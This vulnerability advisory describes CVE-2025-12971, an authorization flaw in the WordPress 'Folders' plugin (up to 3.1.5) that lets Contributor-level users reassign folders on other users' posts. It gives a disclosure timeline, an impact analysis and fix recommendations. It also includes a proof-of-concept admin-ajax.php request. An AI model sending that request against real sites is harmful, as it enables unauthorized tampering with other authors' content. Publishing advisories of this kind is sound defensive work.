CVE-2025-12971 affects the WordPress plugin “Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager” (plugin slug: folders), which is widely deployed and reported at roughly 90,000+ active installations in the WordPress.org ecosystem (often referenced as “100k+” in rounded terms). The vulnerability is an incorrect authorization / object-level access control failure in AJAX handlers used to assign “folder” taxonomy terms to posts and pages. In effect, a low-privileged authenticated user can modify folder assignments on content they do not own by directly calling the AJAX endpoints with a victim post_id, bypassing the normal WordPress UI restrictions that would otherwise block edits to another author’s post.
| CVE | CVE-2025-12971 |
| Plugin Version | Folders <= 3.1.5 |
| Critical | High |
| All Time | 2 005 942 |
| Active installations | 100 000+ |
| Publicly Published | November 26, 2025 |
| Last Updated | November 26, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12971 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/folders/folders-315-incorrect-authorization-to-authenticated-contributor-folder-content-manipulation |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| October 30, 2025 | Plugin testing and vulnerability detection in the Folders have been completed |
| October 30, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 26, 2025 | Registered CVE-2025-12971 |
Discovery of the Vulnerability
The exposed behavior is driven by the plugin’s server-side logic applying a coarse capability check (e.g., “can edit posts/pages in general”) and a term-scoped nonce tied to a folder term, while failing to enforce a post-scoped authorization check for each target object. The NVD record describes this as a “misconfigured capability check” in the wcp_change_post_folder function, impacting versions up to and including 3.1.5, and enabling authenticated attackers with Contributor-level access and above to move arbitrary folder contents. In practical terms, this means the handler validates that the caller is a logged-in user with some editorial capability and that the nonce is valid for the destination folder, but does not validate that the caller is permitted to edit the specific post_id being modified—precisely the condition that produces an IDOR-style horizontal privilege escalation.
Understanding of Missing Auth attack’s
In WordPress security, the difference between “permission to use a feature” and “permission to affect a specific object” is decisive. Folder assignment looks like “just organization,” but on production sites it is frequently part of editorial workflow, publishing rules, internal review queues, and content governance conventions; unauthorized changes can create operational confusion, hide content from expected views, and sabotage team processes without touching the post body itself. CVE-2025-12971 is a textbook case of CWE-863 (Incorrect Authorization), where a check exists but is not the correct check for the object being modified. The risk is amplified by the fact that attackers do not need to defeat authentication and do not need administrator access; they only need a role that can access the relevant editor screens and obtain a valid nonce for a folder term, then they can apply that folder term to a post they cannot otherwise edit.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-12971, an attacker with Contributor+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/edit.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 91 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Contributor+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=wcp_change_post_folder&post_id=1433&folder_id=89&type=post&status=1&nonce=("folder_id":89,"........"nonce":"bd59d34e7f" -> http://127.0.0.1/wordpress/wp-admin/edit.php,)____
Operationally, this is best understood as workflow tampering and horizontal privilege escalation rather than a purely cosmetic change. An attacker with Contributor/Author-level access can reorganize other users’ content into arbitrary folders, undermining editorial organization, misrouting content pipelines, and creating confusion during content review or publication cycles. On sites where folder views drive internal dashboards, these changes can effectively “hide” or “misclassify” content without needing to modify titles, bodies, or statuses, which can delay detection and complicate incident response. The NVD entry scores the impact primarily on integrity (unauthorized modification of data) and explicitly states that affected versions enable authenticated attackers to move arbitrary folder contents. Even when the change is reversible, the security consequence is that content governance boundaries between authors are no longer enforced reliably at the application layer.
Recommendations for Improved Security
The core fix is to enforce object-level authorization for every post being modified, not merely a folder-term authorization or a coarse “edit posts” permission. Before calling wp_set_post_terms(...), the handler should validate the post_id is an integer, confirm the post exists, and then enforce current_user_can('edit_post', $post_id)(and/or current_user_can('edit_page', $post_id) depending on post type) for each target object, failing closed if the user lacks permission. This is the missing step that distinguishes “user can use folders” from “user can change folders on this post.” In parallel, keep the nonce check, but treat it as request integrity rather than authorization; the CVE itself is about incorrect authorization, so the capability check must be corrected, not merely supplemented. Finally, site owners should update beyond the affected range (NVD lists versions up to and including 3.1.5 as vulnerable), audit role assignments for unnecessary Contributor/Author accounts, and consider monitoring for suspicious bulk folder moves as an operational detection control.
By taking proactive measures to address Missing Auth vulnerabilities like CVE-2025-12971 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.